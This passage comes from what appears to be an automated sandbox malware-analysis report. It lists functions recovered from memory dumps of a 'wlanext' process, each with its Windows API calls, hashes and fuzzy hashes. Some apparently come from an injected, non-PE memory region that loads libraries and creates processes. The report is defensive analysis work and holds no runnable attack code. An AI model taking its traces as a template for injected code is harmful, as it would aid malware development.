                                            • Instruction Fuzzy Hash: 36E0261164411439E211412D6C47FFFBA8CEB82F16F0442AEFA44D61C3EBC08446C3F2
                                            Function 00BCA808 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BBF1D2,00BBF1D2,?,00000000,?,?), ref: 00BCA800
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: cebc88800f537aebb60e537cebe09de6d928d27c17f95a36b669ac6389352f71
                                            • Instruction ID: 2922afcca70b2d974dd045ff418f2c078b35b46d57dc2b1edc38ec3ebcc14cc3
                                            • Opcode Fuzzy Hash: cebc88800f537aebb60e537cebe09de6d928d27c17f95a36b669ac6389352f71
                                            • Instruction Fuzzy Hash: A5019EB52002046FDB10DF54DC85FE73BA8EF44B54F148499FA4D5B282D931A911CBE0
                                            Function 00BBACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00BBAD62
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction ID: e32a276c844b3f7779187435aed429a6c362b942f4946111f00a0dec55e5cb36
                                            • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                            • Instruction Fuzzy Hash: 2A011EB5E0020DABDF10EAA4DC42FEEB7B89B54708F0045E9E90997641F671EB188B91
                                            Function 00BCA6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00BCA734
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction ID: f22f34152809c086ef92b3b0225846afb6844a77efe096a8e21c285be5a336ce
                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                            • Instruction Fuzzy Hash: AA01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                            Function 00BCA6DD Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00BCA734
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 26959028561c3d2f036da4e0273a4ca9c16cd547dc69ee125fe83b7a83a9a4c5
                                            • Instruction ID: c42352cc09650c0afcff33a922dc00187a9672aa4d130ba68ad12d17212540d8
                                            • Opcode Fuzzy Hash: 26959028561c3d2f036da4e0273a4ca9c16cd547dc69ee125fe83b7a83a9a4c5
                                            • Instruction Fuzzy Hash: 6901F2B6208148AFCB04CF98DC80DEB3BA9AF8C314F258258FA5997245C630E841CBA0
                                            Function 00BC91B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00BBF050,?,?,00000000), ref: 00BC91EC
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 973f13a00399e650b7868e8cf60fae81c7cf5cd4fa202be48298fe99500642fb
                                            • Instruction ID: f6af9a9f580c8570a93dcfc008d64cb925e661e76d1b9580c222362450f016da
                                            • Opcode Fuzzy Hash: 973f13a00399e650b7868e8cf60fae81c7cf5cd4fa202be48298fe99500642fb
                                            • Instruction Fuzzy Hash: 3DE06D333802043AE2206599AC03FA7B29CDB81B20F19006AFA0DEA2C1D995F80142A4
                                            Function 00BC91A3 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00BBF050,?,?,00000000), ref: 00BC91EC
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: b7a1eb48f43eb983a6d1d0ad4c0a6b38cef8efb526e412b5818f5ae45d645f28
                                            • Instruction ID: 5fe2b6c53f7593581cf746f33dd0c8c1ec0c1108ee66e5176a9a82969975cb04
                                            • Opcode Fuzzy Hash: b7a1eb48f43eb983a6d1d0ad4c0a6b38cef8efb526e412b5818f5ae45d645f28
                                            • Instruction Fuzzy Hash: 4DF02B363803043AE73065698C07FE777DCCB85F10F190068F649F71C2D592F80142A8
                                            Function 00BCA7C1 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BBF1D2,00BBF1D2,?,00000000,?,?), ref: 00BCA800
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 32f6bc2f68435f78dba9cd5b297aa9fffe6c51629055841358db246ff3bbd1e9
                                            • Instruction ID: 8bd959f11165ab9ce8bf6ec91e59efbb209ba5d009cd70e7eef2d0c3720fc7c7
                                            • Opcode Fuzzy Hash: 32f6bc2f68435f78dba9cd5b297aa9fffe6c51629055841358db246ff3bbd1e9
                                            • Instruction Fuzzy Hash: D7E022B42002046BCB10DF14EC84FE73BA8EF41B14F20809DFD8A6B682CD31A811CBB0
                                            Function 00BCA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00BC4536,?,00BC4CAF,00BC4CAF,?,00BC4536,?,?,?,?,?,00000000,00000000,?), ref: 00BCA65D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction ID: 79b497ad07b471b09f6060979a88edf5983599501185a662a2e03f524677356c
                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                            • Instruction Fuzzy Hash: 11E046B1200208ABDB14EF99CC41EA777ACEF88B54F118598FE089B242C630F910CBF0
                                            Function 00BCA7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BBF1D2,00BBF1D2,?,00000000,?,?), ref: 00BCA800
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction ID: 5ee175c1895c14c2ec7144360eb228ed40b394f35a8c63b070b0bcad965ad10d
                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                            • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADEF88654F118158BA0857241C930E8108BF5
                                            Function 00BBF6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,00BB8D14,?), ref: 00BBF6FB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449038792.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_bb0000_wlanext.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                            • Instruction ID: 5644b5286670400019993489f494caa9021ab19efcbc5a2bb03eb8c2e8b56a7b
                                            • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                            • Instruction Fuzzy Hash: F5D05E616503092BE610AAA49C13F6632C8AB44B00F4A00A4F949962C3D990E5008165
                                            Function 03632C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                            • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6e72f6729b844c32bcd516ef4aa7cff22f7899c7898634c6f00a5ddaaa5dce2e
                                            • Instruction ID: 3c816cd3c48fe8309a0e7ae132eff44b7827464904e362c0a2fbb68bd7fe47cf
                                            • Opcode Fuzzy Hash: 6e72f6729b844c32bcd516ef4aa7cff22f7899c7898634c6f00a5ddaaa5dce2e
                                            • Instruction Fuzzy Hash: ABB09B71D015C5C5DB51F7604708717790467D1701F19C461D2030751F4779D1D1E275

                                            Non-executed Functions

                                            Function 00FEF160 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 97fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlStringFromGUID.NTDLL(00FEE90B,?), ref: 00FEF184
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF18B
                                            • memcpy.MSVCRT ref: 00FEF1CD
                                            • RtlFreeUnicodeString.NTDLL(?,?,?,?,?,?,00FEE90B,?), ref: 00FEF1E9
                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(\\.\NativeWiFiP,C0000000,00000000,00000000,00000003,40000000,00000000,00000000,?,00000000,?,?,00FEE90B,?), ref: 00FEF208
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEF222
                                            • BindIoCompletionCallback.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(00000000,00FEF100,00000000), ref: 00FEF23E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEF248
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00FEF251
                                              • Part of subcall function 00FEF936: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000057,?,00000000,00FE9DC3,00000000,?,00000000,00000001,?,00FE2F27,00000014,?,00000002,00000000,?,?), ref: 00FEF944
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$Last$String$BindCallbackCloseCompletionCreateFileFreeFromHandleStatusUnicodememcpy
                                            • String ID: \\.\NativeWiFiP$\\.\NativeWiFiP\
                                            • API String ID: 921034847-3014666177
                                            • Opcode ID: 308497a07bb01e029999f6ec0ea8c682acc4fb569bd24543a4ab8f0bdddbce34
                                            • Instruction ID: 765329090cc25fe7b058e33bf93a0f212a8b3c9a0c382df727ece1f6e1b0d559
                                            • Opcode Fuzzy Hash: 308497a07bb01e029999f6ec0ea8c682acc4fb569bd24543a4ab8f0bdddbce34
                                            • Instruction Fuzzy Hash: 6731AD72E0025AABDB109FA9DC44BBE77BCBF48320F144136FA55E6190EB708905E764
                                            Function 00FE3355 Relevance: 10.6, APIs: 7, Instructions: 129COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00FE33B7
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,00000000), ref: 00FE33EE
                                            • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000), ref: 00FE33F5
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE3402
                                            • AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,00000000,?,0000010C,00000000,00000000), ref: 00FE3442
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE344C
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?,0000010C,?), ref: 00FE348F
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorLastProcessToken$AdjustCloseCurrentHandleMessageOpenPrivilegesTracememset
                                            • String ID:
                                            • API String ID: 2432845927-0
                                            • Opcode ID: c09f57f53d77f4f48aebb31c291ffece0f46c2120aba54d07c437d8629bf4fbe
                                            • Instruction ID: 578384067a3737b63de480c3dbd6ebfaa7df1d9e9d6910af98da0549d2708dc7
                                            • Opcode Fuzzy Hash: c09f57f53d77f4f48aebb31c291ffece0f46c2120aba54d07c437d8629bf4fbe
                                            • Instruction Fuzzy Hash: AF41A172900288AFD716DF568C4CF6A7B6ABF00354F154098F9059B2E6CB71CE80FB55
                                            Function 00FEF267 Relevance: 9.1, APIs: 6, Instructions: 70nativefileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,00000000,-0000001C,?,?,?,?,00FEF8FF,00000000,-0000001C,00000000,00000004,00000000), ref: 00FEF27B
                                            • NtDeviceIoControlFile.NTDLL ref: 00FEF29E
                                            • NtWaitForSingleObject.NTDLL ref: 00FEF2B3
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?,00FEF8FF,00000000,-0000001C,00000000,00000004,00000000,?,00000000,00000003,00000000,?,00000000), ref: 00FEF2C3
                                            • RtlNtStatusToDosError.NTDLL ref: 00FEF2F0
                                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00FEF8FF,00000000,-0000001C,00000000,00000004,00000000,?,00000000,00000003,00000000,?,00000000), ref: 00FEF2F7
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Error$CloseControlCreateDeviceEventFileHandleLastObjectSingleStatusWait
                                            • String ID:
                                            • API String ID: 651683009-0
                                            • Opcode ID: 7a47af04813607dde3733906467fb780b0fa30586bb54f5823944097e9e9a560
                                            • Instruction ID: 814dff7784b9218ec6d9b2955dcab76fcf73a02257f10bfedaec34993f4ad34d
                                            • Opcode Fuzzy Hash: 7a47af04813607dde3733906467fb780b0fa30586bb54f5823944097e9e9a560
                                            • Instruction Fuzzy Hash: F2116D7AA01119BFDB159FA58C48FBB3AADEF89760F110024FA05E7240DA31DC00EBA0
                                            Function 00FEFF45 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00FEFF72
                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00FEFF81
                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00FEFF8A
                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00FEFF93
                                            • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00FEFFA8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 947b1dd1bfb1f5b269a861fca3525885ab75828ebfa0f2d4f814b3c6bd71c08a
                                            • Instruction ID: 5cdb1c7a101e0dab20e20c35a31c792f3028705b473dbf6682ab07216f4e6d21
                                            • Opcode Fuzzy Hash: 947b1dd1bfb1f5b269a861fca3525885ab75828ebfa0f2d4f814b3c6bd71c08a
                                            • Instruction Fuzzy Hash: AB114C76D00248EBCB10DFB9D948AAEB7F8FF48311F5148A6D402E7214EB309A44EB50
                                            Function 00FF0063 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00FF0199,00FE1000), ref: 00FF006A
                                            • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00FF0199,?,00FF0199,00FE1000), ref: 00FF0073
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00FF0199,00FE1000), ref: 00FF007E
                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00FF0199,00FE1000), ref: 00FF0085
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                            • String ID:
                                            • API String ID: 3231755760-0
                                            • Opcode ID: ecf2f14e43c51dd30463f6520063881c60a4281852854236be2bd239eed4960a
                                            • Instruction ID: 84f7f0118dc3bffad4ecdd6dbd785e1bad48a88e65c1dbd7dacf7f64c9c0aab2
                                            • Opcode Fuzzy Hash: ecf2f14e43c51dd30463f6520063881c60a4281852854236be2bd239eed4960a
                                            • Instruction Fuzzy Hash: B3D0C93300010CABDB902BE1ED0CEA93E2CEF44212F000000F30D82021CE314441FB65
                                            Function 00FEE653 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,00000000,?,?,?,?,00FEE417,000003E4), ref: 00FEE66E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00FEE417,000003E4), ref: 00FEE67C
                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,00FEE417,000003E4), ref: 00FEE6BE
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00FEE417,000003E4), ref: 00FEE6F6
                                              • Part of subcall function 00FEE47B: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,00FEE5E0,0000002B,00FE27D0,0000000B,?,00000005,0000000E,00000004,00000000,00000004,00000000,00000000,0000000E,?,00FEE5E0), ref: 00FEE4C4
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorHeapLast$FreeMessageProcessTrace
                                            • String ID:
                                            • API String ID: 782704287-0
                                            • Opcode ID: 1a564ca289c2df7b04152a8a405293ef0945f558b61a2fbc4497d5b38689e3a8
                                            • Instruction ID: fc7b82061e1a450a8f9446b684969713903a48819f67284f818603b70013d65f
                                            • Opcode Fuzzy Hash: 1a564ca289c2df7b04152a8a405293ef0945f558b61a2fbc4497d5b38689e3a8
                                            • Instruction Fuzzy Hash: DE21F472500284EBCB2A5F96EC44F793E6AFF88390F240418FA01461B6DB72CC92FB50
                                            Function 00FEFD20 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_0000FCD0), ref: 00FEFD25
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 212c95047942e403bfa6216f3db472d551c27a1aa18f53302e3f783af487eab7
                                            • Instruction ID: 2f0568e08353ed546a9b10b590ff6eb353dcd02d4f51f7fb6bad0619f5ca4c05
                                            • Opcode Fuzzy Hash: 212c95047942e403bfa6216f3db472d551c27a1aa18f53302e3f783af487eab7
                                            • Instruction Fuzzy Hash: 299002A13A114846575017795C0D91935945E88612B620860A405D4058DE518248F552
                                            Function 00FE5CD6 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 333libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE5D2E
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE5D86
                                            • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000), ref: 00FE5D91
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000), ref: 00FE5DA0
                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,Dot11ExtIhvGetVersionInfo,?,00000000,00000000), ref: 00FE5DE6
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000), ref: 00FE5DF3
                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,Dot11ExtIhvInitService,?,00000000,00000000), ref: 00FE5E39
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000), ref: 00FE5E46
                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,Dot11ExtIhvInitVirtualStation,?,00000000,00000000), ref: 00FE5E7E
                                            • memset.MSVCRT ref: 00FE5F18
                                            • memset.MSVCRT ref: 00FE5F3F
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,00000000,00000000,?,00000058,?), ref: 00FE6016
                                            • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000,?,00000000,00000000), ref: 00FE60B4
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,?,00000000,00000000), ref: 00FE60BF
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,?,00000000,00000000), ref: 00FE60D4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmpDownload File
